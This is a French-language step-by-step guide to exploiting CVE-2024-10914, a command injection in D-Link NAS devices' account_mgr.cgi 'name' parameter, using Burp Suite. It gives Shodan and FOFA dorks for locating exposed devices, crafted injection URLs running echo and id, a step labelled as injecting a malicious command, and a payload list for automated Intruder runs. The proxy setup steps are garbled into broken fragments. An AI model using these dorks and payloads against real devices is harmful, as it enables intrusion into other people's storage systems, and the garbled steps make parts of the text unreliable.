
CVE-2024-10914_Tests manuels avec burpsuite
Utilisez le dork de recherche suivant pour trouver des appareils D-Link NAS potentiellement vulnérables :
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
Cette chaîne de recherche permet d'identifier les appareils exécutant l'application D-Link DNS ShareCenter vulnérable avec la version spécifique du serveur Lighttpd affectée par la vulnérabilité.
Ce guide fournit des instructions étape par étape sur la façon de tester manuellement une vulnérabilité d'injection de commandes (CVE-2024-10914) dans le paramètre name des NAS D-Link à l'aide de Burp Suite. URL cible : http://Target.
127.0.0.1:8080)127.0.0.1 au port 8080.http://Target.Localiser le paramètre vulnérable : Dans la requête interceptée, recherchez le paramètre name dans l'URL. Il devrait apparaître comme suit :
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
Injecter une commande de test : Modifiez le paramètre name pour y inclure une commande de test comme echo "test" :
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
Envoyer la requête modifiée : Transmettez la requête modifiée au serveur.
Vérifier la réponse : Recherchez la sortie de la commande injectée dans la réponse. Par exemple, si le serveur a exécuté echo "test", vous devriez voir :
test
Injecter une commande malveillante : Si le test réussit, essayez des commandes plus sophistiquées, comme :
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
Envoyer la requête d'exploitation : Transmettez cette requête au serveur.
Analyser la réponse : Vérifiez si la sortie de la commande (par exemple, les informations d'ID utilisateur) est présente dans la réponse.
Utiliser Intruder : Automatisez les tests avec l'outil Intruder de Burp Suite.
name comme position de payload.Exemples de payloads :
echo "test"
id
uname -a
ls /etc
Démarrer Intruder : Lancez l'attaque Intruder pour tester plusieurs payloads automatiquement.